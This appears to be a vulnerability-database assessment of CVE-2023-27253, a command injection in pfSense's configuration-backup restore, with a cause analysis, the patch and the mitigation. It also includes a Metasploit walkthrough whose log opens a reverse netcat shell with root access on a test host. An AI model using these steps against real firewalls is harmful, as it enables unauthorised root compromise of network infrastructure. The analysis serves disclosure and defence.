Attacker Value
Low
(1 user assessed)
Exploitability
Very High
(1 user assessed)
User Interaction
None
Privileges Required
Low
Attack Vector
Network
2

CVE-2023-27253

Disclosure Date: March 17, 2023
CVE-2023-27253 CVSS v3 Base Score: 8.8
Add MITRE ATT&CK tactics and techniques that apply to this CVE.

Description

A command injection vulnerability in the function restore_rrddata() of Netgate pfSense v2.7.0 allows authenticated attackers to execute arbitrary commands via manipulating the contents of an XML file supplied to the component config.xml.

Add Assessment

2
Ratings
  • Attacker Value
    Low
  • Exploitability
    Very High
Common in enterpriseGives privileged accessVulnerable in default configurationAuthenticated
Technical Analysis

On March 17th, 2023 it was announced that pfSense firewalls versions 2.6.0 and below were vulnerable to an authenticated remote code execution vulnerability resulting in code execution in the context of the root user.

Authenticated users, from the /diag_backup.php endpoint, are able open and restore a backup pfSense configuration XML file:

Screenshot 2023-07-12 at 3 29 18 PM

The name of the configuration XML file is user configurable. In vulnerable versions the filename does not get sanitized properly before being used in an exec() command in the restore_rrddata function inside the file: /etc/inc/config.lib.inc.

The vulnerable exec() call can be seen below on line 288 which is an excerpt from the vulnerable version 2.6.0source code.

Screenshot 2023-07-12 at 3 19 11 PM

The following escapeshellarg patch has been applied:

exec("{$rrdtool} restore -f " . escapeshellarg($xml_file) . ' ' . escapeshellarg($rrd_file), $output, $status);

Attacker Value and Exploitation

As this requires authentication the attacker value isn’t super high although it could come in handy for a malicious actor as it provides root level access on pfSense – the ”World’s Most Trusted Open Source Firewall”. Exploitation is super straightforward once credentials are obtained.

Metasploit

Exploiting this vulnerability using metasploit is as easy as one-two-three (or “set rhosts”, “set lhost”, “run”)

msf6 > use unix/http/pfsense_config_data_exec
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(unix/http/pfsense_config_data_exec) > set rhosts 172.16.199.190
rhosts => 172.16.199.190
msf6 exploit(unix/http/pfsense_config_data_exec) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(unix/http/pfsense_config_data_exec) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The target appears to be running pfSense version 2.5.1-RELEASE, which is unpatched!
[*] Command shell session 7 opened (172.16.199.1:4444 -> 172.16.199.191:55669) at 2023-07-12 14:48:15 -0400

id
uid=0(root) gid=0(wheel) groups=0(wheel)
uname -a
FreeBSD pfSense.home.arpa 12.2-STABLE FreeBSD 12.2-STABLE 1b709158e581(RELENG_2_5_0) pfSense  amd64

Mitigation

Update pfSense to version 2.7.0 or higher.

Log in to Add Reply
CVSS V3 Severity and Metrics
Base Score:
8.8 High
Impact Score:
5.9
Exploitability Score:
2.8
Vector:
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Attack Vector (AV):
Network
Attack Complexity (AC):
Low
Privileges Required (PR):
Low
User Interaction (UI):
None
Scope (S):
Unchanged
Confidentiality (C):
High
Integrity (I):
High
Availability (A):
High

General Information

Offensive Application
Unknown
Utility Class
Unknown
Ports
Unknown
OS
Unknown
Vulnerable Versions
n/a
Prerequisites
Unknown
Discovered By
Unknown
PoC Author
Unknown
Metasploit Module
Unknown
Reporter
Unknown

Vendors

  • netgate

Products

  • pfsense 2.7.0

Additional Info

Authenticated
Unknown
Exploitable
Unknown
Reliability
Unknown
Stability
Unknown
Available Mitigations
Unknown
Shelf Life
Unknown
Userbase/Installbase
Unknown
Patch Effectiveness
Unknown
Technical Analysis